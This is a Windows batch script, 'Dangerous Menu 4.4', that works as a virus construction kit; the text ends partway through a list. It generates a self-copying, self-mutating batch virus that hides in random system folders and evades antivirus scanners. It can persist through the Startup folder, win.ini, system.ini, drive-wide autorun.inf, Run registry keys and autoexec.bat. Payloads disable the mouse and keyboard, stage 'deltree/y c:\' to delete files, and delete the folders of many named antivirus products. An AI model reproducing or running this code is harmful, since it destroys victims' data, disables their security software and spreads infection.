@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
set Gpo=echo.b.Writeline
set jHsCEP=ctty nul
set BEKo=errorlevel
set egOxbF=batvirus.vbs
set lOpJy=ctty con
%lOpJy%
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.4 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo.     Fooling AV`z
echo      ÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo    1 - EICAR
echo    2 - Fake bytes
echo    3 - EICAR & fake bytes
echo    4 - Metamorphic sets
echo.
echo    5 - Next page
echo.
echo    Q - eXit
echo.
choice /c:12345Q>nul
if %BEKo% 6 goto end
if %BEKo% 5 goto a4
if %BEKo% 4 goto a4c
if %BEKo% 3 goto a3
if %BEKo% 2 goto a2
if %BEKo% 1 goto a1
goto done

:a4c
cls
%jHsCEP%
echo.randomize(timer)>%egOxbF%
echo.set a=CreateObject("scripting.filesystemobject")>>%egOxbF%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%egOxbF%
%Gpo% ":: Generated by Dangerous Menu [DvL]">>%egOxbF%
%Gpo% "@echo off">>%egOxbF%
%Gpo% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %BEKo% 1 %jHsCEP%"&chr(124)&"if not %BEKo% 1 exit">>%egOxbF%
%Gpo% "break off">>%egOxbF%
echo.c="">>%egOxbF%
echo.d=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To d>>%egOxbF%
echo.c=c&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "md %%windir%%\system\"&c&">nul">>%egOxbF%
%Gpo% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&">nul">>%egOxbF%
echo.e="">>%egOxbF%
echo.f=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To f>>%egOxbF%
echo.e=e&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&e&"=deltree/y c:\">>%egOxbF%
echo.g="">>%egOxbF%
echo.h=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To h>>%egOxbF%
echo.g=g&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&g&"=progra~1\">>%egOxbF%
set +=&Chr(34)&
%Gpo% "echo.Randomize>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.set a=CreateObject("%+%"scripting.filesystemobject"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.set c=a.opentextfile("%+%"%%windir%%\system\"&c&"\tmpdelis.bat"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.d=c.readall>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.c.close>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.d=replace(d,"%+%e%+%",randstring(int(rnd*7)+2))>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.d=replace(d,"%+%g%+%",randstring(int(rnd*7)+2))>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.function randstring(length)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.for cnt=1 to length>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.randomize>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.if int(rnd*2000/1000)=1 then>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.freg=int(rnd*26)+97>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.else>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.freg=int(rnd*26)+65>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.end if>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.randstring=randstring&chr(freg)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.next>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.end function>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.set c=a.opentextfile("%+%"%%windir%%\system\"&c&"\tmpdelis.bat"%+%",2)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.c.write d>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.c.close>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
set +=
%lOpJy%
goto 001

:a1
cls
%jHsCEP%
echo.randomize(timer)>%egOxbF%
echo.set a=CreateObject("scripting.filesystemobject")>>%egOxbF%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%egOxbF%
%Gpo% "X5O!P%%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*">>%egOxbF%
%Gpo% ":: Generated by Dangerous Menu [DvL]">>%egOxbF%
%Gpo% "@echo off">>%egOxbF%
%Gpo% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %BEKo% 1 %jHsCEP%"&chr(124)&"if not %BEKo% 1 exit">>%egOxbF%
%Gpo% "break off">>%egOxbF%
echo.c="">>%egOxbF%
echo.d=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To d>>%egOxbF%
echo.c=c&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "md %%windir%%\system\"&c&">nul">>%egOxbF%
%Gpo% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&">nul">>%egOxbF%
echo.e="">>%egOxbF%
echo.f=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To f>>%egOxbF%
echo.e=e&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&e&"=deltree/y c:\">>%egOxbF%
echo.g="">>%egOxbF%
echo.h=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To h>>%egOxbF%
echo.g=g&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&g&"=progra~1\">>%egOxbF%
%lOpJy%
goto 001

:a2
cls
%jHsCEP%
echo.randomize(timer)>%egOxbF%
echo.set a=CreateObject("scripting.filesystemobject")>>%egOxbF%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%egOxbF%
echo.c=int((rnd*9999999999999)+1)>>%egOxbF%
echo.d=int((rnd*9999999999999)+1)>>%egOxbF%
echo.e=int((rnd*9999999999999)+1)>>%egOxbF%
echo.f=int((rnd*9999999999999)+1)>>%egOxbF%
echo.g=int((rnd*9999999999999)+1)>>%egOxbF%
echo.b.Write c&d&e&f&g&c&d&e&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write d&e&f&g&c&d&e&f&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write e&f&g&c&d&e&f&g&c>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write f&g&c&d&e&f&g&c&d>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write g&c&d&e&f&g&c&d&e>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write c&d&e&f&g&c&d&e&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write d&e&f&g&c&d&e&f&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write e&f&g&c&d&e&f&g&c>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write f&g&c&d&e&f&g&c&d>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write g&c&d&e&f&g&c&d&e>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
%Gpo% ":: Generated by Dangerous Menu [DvL]">>%egOxbF%
%Gpo% "@echo off">>%egOxbF%
%Gpo% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %BEKo% 1 %jHsCEP%"&chr(124)&"if not %BEKo% 1 exit">>%egOxbF%
%Gpo% "break off">>%egOxbF%
echo.c="">>%egOxbF%
echo.d=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To d>>%egOxbF%
echo.c=c&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "md %%windir%%\system\"&c&">nul">>%egOxbF%
%Gpo% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&">nul">>%egOxbF%
echo.e="">>%egOxbF%
echo.f=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To f>>%egOxbF%
echo.e=e&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&e&"=deltree/y c:\">>%egOxbF%
echo.g="">>%egOxbF%
echo.h=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To h>>%egOxbF%
echo.g=g&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&g&"=progra~1\">>%egOxbF%
%lOpJy%
goto 001

:a3
cls
%jHsCEP%
echo.randomize(timer)>%egOxbF%
echo.set a=CreateObject("scripting.filesystemobject")>>%egOxbF%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%egOxbF%
%Gpo% "X5O!P%%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*">>%egOxbF%
echo.c=int((rnd*9999999999999)+1)>>%egOxbF%
echo.d=int((rnd*9999999999999)+1)>>%egOxbF%
echo.e=int((rnd*9999999999999)+1)>>%egOxbF%
echo.f=int((rnd*9999999999999)+1)>>%egOxbF%
echo.g=int((rnd*9999999999999)+1)>>%egOxbF%
echo.b.Write c&d&e&f&g&c&d&e&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write d&e&f&g&c&d&e&f&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write e&f&g&c&d&e&f&g&c>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write f&g&c&d&e&f&g&c&d>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write g&c&d&e&f&g&c&d&e>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write c&d&e&f&g&c&d&e&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write d&e&f&g&c&d&e&f&f>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write e&f&g&c&d&e&f&g&c>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write f&g&c&d&e&f&g&c&d>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
echo.b.Write g&c&d&e&f&g&c&d&e>>%egOxbF%
echo.b.WriteBlankLines "1">>%egOxbF%
%Gpo% ":: Generated by Dangerous Menu [DvL]">>%egOxbF%
%Gpo% "@echo off">>%egOxbF%
%Gpo% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %BEKo% 1 %jHsCEP%"&chr(124)&"if not %BEKo% 1 exit">>%egOxbF%
%Gpo% "break off">>%egOxbF%
echo.c="">>%egOxbF%
echo.d=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To d>>%egOxbF%
echo.c=c&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "md %%windir%%\system\"&c&">nul">>%egOxbF%
%Gpo% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&">nul">>%egOxbF%
echo.e="">>%egOxbF%
echo.f=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To f>>%egOxbF%
echo.e=e&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&e&"=deltree/y c:\">>%egOxbF%
echo.g="">>%egOxbF%
echo.h=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To h>>%egOxbF%
echo.g=g&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&g&"=progra~1\">>%egOxbF%
%lOpJy%
goto 001

:a4
cls
%jHsCEP%
echo.randomize(timer)>%egOxbF%
echo.set a=CreateObject("scripting.filesystemobject")>>%egOxbF%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%egOxbF%
%Gpo% ":: Generated by Dangerous Menu [DvL]">>%egOxbF%
%Gpo% "@echo off">>%egOxbF%
%Gpo% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %BEKo% 1 %jHsCEP%"&chr(124)&"if not %BEKo% 1 exit">>%egOxbF%
%Gpo% "break off">>%egOxbF%
echo.c="">>%egOxbF%
echo.d=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To d>>%egOxbF%
echo.c=c&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "md %%windir%%\system\"&c&">nul">>%egOxbF%
%Gpo% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&">nul">>%egOxbF%
echo.e="">>%egOxbF%
echo.f=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To f>>%egOxbF%
echo.e=e&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&e&"=deltree/y c:\">>%egOxbF%
echo.g="">>%egOxbF%
echo.h=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To h>>%egOxbF%
echo.g=g&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&g&"=progra~1\">>%egOxbF%
%lOpJy%

:001
cls
echo.
echo.
echo.
echo        Running options
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Run via STARTUP folder
echo    2 - Run via WIN.INI file
echo    3 - Run via SYSTEM.INI file
echo    4 - Run via AUTORUN.INF file
echo    5 - Run via REGISTRY keys
echo    6 - Run via AUTOEXEC.BAT file
echo    7 - Run via WINSTART.BAT FILE
echo.
echo    8 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12345678Q>nul
if %BEKo% 9 goto done
if %BEKo% 8 goto 002
if %BEKo% 7 goto b2a
if %BEKo% 6 goto b1a
if %BEKo% 5 goto a9b
if %BEKo% 4 goto a8b
if %BEKo% 3 goto a7
if %BEKo% 2 goto a6
if %BEKo% 1 goto a5
goto done

:b1a
cls
%jHsCEP%
%Gpo% "echo.@call %%windir%%\system\"&c&"\tmpdelis.bat>>c:\autoexec.bat">>%egOxbF%
%lOpJy%
goto 002

:b2a
cls
%jHsCEP%
%Gpo% "echo.@call %%windir%%\system\"&c&"\tmpdelis.bat>%%windir%%\winstart.bat">>%egOxbF%
%lOpJy%
goto 002

:a5
cls
%jHsCEP%
%Gpo% "copy %%0 %%windir%%\startm~1\programs\startup\"&c&".bat>nul">>%egOxbF%
%lOpJy%
goto 002

:a6
cls
%jHsCEP%
%Gpo% "find /v /i "&Chr(34)&"[windows]"&Chr(34)&Chr(60)&"%%windir%%\win.ini>1">>%egOxbF%
%Gpo% "find /v /i "&Chr(34)&"load="&Chr(34)&Chr(60)&"1>2">>%egOxbF%
%Gpo% "find /v /i "&Chr(34)&"run="&Chr(34)&Chr(60)&"2>1">>%egOxbF%
%Gpo% "find /v /i "&Chr(34)&"NullPort="&Chr(34)&Chr(60)&"1>2">>%egOxbF%
%Gpo% "deltree/y 1>nul">>%egOxbF%
%Gpo% "echo.[windows]>%%windir%%\win.ini">>%egOxbF%
%Gpo% "echo.load=%windir%\system\"&c&"\tmpdelis.bat>>%%windir%%\win.ini">>%egOxbF%
%Gpo% "echo.run=>>%%windir%%\win.ini">>%egOxbF%
%Gpo% "echo.NullPort=None>>%%windir%%\win.ini">>%egOxbF%
%Gpo% "echo.>>%%windir%%\win.ini">>%egOxbF%
%Gpo% "type 2>>%%windir%%\win.ini">>%egOxbF%
%Gpo% "deltree/y 2>nul">>%egOxbF%
%lOpJy%
goto 002

:a7
cls
%jHsCEP%
%Gpo% "find /v /i "&Chr(34)&"[boot]"&Chr(34)&Chr(60)&"%%windir%%\system.ini>1">>%egOxbF%
%Gpo% "find /v /i "&Chr(34)&"shell=explorer.exe"&Chr(34)&Chr(60)&"1>2">>%egOxbF%
%Gpo% "deltree/y 1>nul">>%egOxbF%
%Gpo% "echo.[boot]>%%windir%%\system.ini">>%egOxbF%
%Gpo% "echo.Shell=Explorer.exe %windir%\system\"&c&"\tmpdelis.bat>>%%windir%%\system.ini">>%egOxbF%
%Gpo% "echo.>>%%windir%%\system.ini">>%egOxbF%
%Gpo% "type 2>>%%windir%%\system.ini">>%egOxbF%
%Gpo% "deltree/y 2>nul">>%egOxbF%
%lOpJy%
goto 002

:a8b
cls
%jHsCEP%
%Gpo% "echo.[AutoRun]>%%windir%%\system\"&c&"\"&c&".inf">>%egOxbF%
%Gpo% "echo.open=%windir%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".inf">>%egOxbF%
%Gpo% "echo.icon=%windir%\system\shell32.dll,0>>%%windir%%\system\"&c&"\"&c&".inf">>%egOxbF%
%Gpo% "for %%%%a in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%a:\nul copy %%windir%%\system\"&c&"\"&c&".inf %%%%a:\autorun.inf /y">>%egOxbF%
%lOpJy%
goto 002

:a9b
cls
echo.
echo.
echo.
echo        Registry startup
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo    1 - Run             (LOCAL MACHINE)
echo    2 - Run-            (LOCAL MACHINE)
echo    3 - RunOnce         (LOCAL MACHINE)
echo    4 - RunServices     (LOCAL MACHINE)
echo    5 - RunServices-    (LOCAL MACHINE)
echo    6 - RunServicesOnce (LOCAL MACHINE)
echo    7 - Run             (CURRENT USER)
echo    8 - RunOnce         (CURRENT USER)
echo.
echo    B - Back to Running options
echo.
echo    9 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:123456789BQ>nul
if %BEKo% 11 goto done
if %BEKo% 10 goto 001
if %BEKo% 9 goto 002
if %BEKo% 8 goto a17b
if %BEKo% 7 goto a16b
if %BEKo% 6 goto a15b
if %BEKo% 5 goto a14b
if %BEKo% 4 goto a13b
if %BEKo% 3 goto a12b
if %BEKo% 2 goto a11b
if %BEKo% 1 goto a10b
goto done

:a10b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%
goto 002

:a11b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run-]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%
goto 002

:a12b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%
goto 002

:a13b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%
goto 002

:a14b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices-]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%
goto 002

:a15b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%
goto 002

:a16b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%
goto 002

:a17b
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "regedit /s %%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%lOpJy%

:002
cls
echo.
echo.
echo.
echo        Mouse & keyboard payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Disable mouse & keyboard
echo    2 - Disable keyboard & swap mouse buttons
echo.
echo    3 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:123Q>nul
if %BEKo% 4 goto done
if %BEKo% 3 goto 003
if %BEKo% 2 goto a9
if %BEKo% 1 goto a8
goto done

:a8
cls
%jHsCEP%
%Gpo% "rundll32 mouse,disable">>%egOxbF%
%Gpo% "rundll32 keyboard,disable">>%egOxbF%
%lOpJy%
goto 003

:a9
cls
%jHsCEP%
%Gpo% "rundll32 user,swapmousebutton">>%egOxbF%
%Gpo% "rundll32 keyboard,disable">>%egOxbF%
%lOpJy%

:003
cls
echo.
echo.
echo.
echo        Atack AV`z
echo        ÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Do retro (method: Removing by deletion)
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 004
if %BEKo% 1 goto a10
goto done

:a10
cls
%jHsCEP%
set &=chr(37)&e&chr(37)&
%Gpo% %&%"antiba~1\>nul">>%egOxbF%
%Gpo% %&%"antiba~2\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.1\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.2\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.3\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.4\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.5\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.6\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.7\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.8\>nul">>%egOxbF%
%Gpo% %&%"antivi~1\>nul">>%egOxbF%
%Gpo% %&%"antivi~2\>nul">>%egOxbF%
%Gpo% %&%"antiviru\>nul">>%egOxbF%
%Gpo% %&%"avg\>nul">>%egOxbF%
%Gpo% %&%"avp\>nul">>%egOxbF%
%Gpo% %&%"avp30\>nul">>%egOxbF%
%Gpo% %&%"avx\>nul">>%egOxbF%
%Gpo% %&%"avpers~1\>nul">>%egOxbF%
%Gpo% %&%"bitdef~1\>nul">>%egOxbF%
%Gpo% %&%"bitdef~2\>nul">>%egOxbF%
%Gpo% %&%"comman~1\>nul">>%egOxbF%
%Gpo% %&%"cleancih\>nul">>%egOxbF%
%Gpo% %&%"esafen\>nul">>%egOxbF%
%Gpo% %&%"findvi~1\>nul">>%egOxbF%
%Gpo% %&%"f-macro\>nul">>%egOxbF%
%Gpo% %&%"f-prot\>nul">>%egOxbF%
%Gpo% %&%"f-prot95\>nul">>%egOxbF%
%Gpo% %&%"f-secu~1\>nul">>%egOxbF%
%Gpo% %&%"fwin\>nul">>%egOxbF%
%Gpo% %&%"fwin32\>nul">>%egOxbF%
%Gpo% %&%"inocul~1\>nul">>%egOxbF%
%Gpo% %&%"inocul~2\>nul">>%egOxbF%
%Gpo% %&%"kasper~1\>nul">>%egOxbF%
%Gpo% %&%"kasper~2\>nul">>%egOxbF%
%Gpo% %&%"mcafee\>nul">>%egOxbF%
%Gpo% %&%"mcafee~1\>nul">>%egOxbF%
%Gpo% %&%"msav\>nul">>%egOxbF%
%Gpo% %&%"norman\>nul">>%egOxbF%
%Gpo% %&%"norton~1\>nul">>%egOxbF%
%Gpo% %&%"norton~2\>nul">>%egOxbF%
%Gpo% %&%"pav\>nul">>%egOxbF%
%Gpo% %&%"pccill~1\>nul">>%egOxbF%
%Gpo% %&%"pc-cil~1\>nul">>%egOxbF%
%Gpo% %&%"rav\>nul">>%egOxbF%
%Gpo% %&%"softwin\>nul">>%egOxbF%
%Gpo% %&%"tbav\>nul">>%egOxbF%
%Gpo% %&%"tbavw95\>nul">>%egOxbF%
%Gpo% %&%"toolkit\>nul">>%egOxbF%
%Gpo% %&%"trendm~1\>nul">>%egOxbF%
%Gpo% %&%"trex\>nul">>%egOxbF%
%Gpo% %&%"virus\>nul">>%egOxbF%
%Gpo% %&%"vpc\>nul">>%egOxbF%
%Gpo% %&%"vs95\>nul">>%egOxbF%
%Gpo% %&%"zonela~1\>nul">>%egOxbF%
%Gpo% %&%"zonela~2\>nul">>%egOxbF%
set &=chr(37)&e&chr(37)&chr(37)&g&chr(37)&
%Gpo% %&%"antiba~1\>nul">>%egOxbF%
%Gpo% %&%"antiba~2\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.1\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.2\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.3\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.4\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.5\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.6\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.7\>nul">>%egOxbF%
%Gpo% %&%"antiba~1.8\>nul">>%egOxbF%
%Gpo% %&%"antivi~1\>nul">>%egOxbF%
%Gpo% %&%"antivi~2\>nul">>%egOxbF%
%Gpo% %&%"avg\>nul">>%egOxbF%
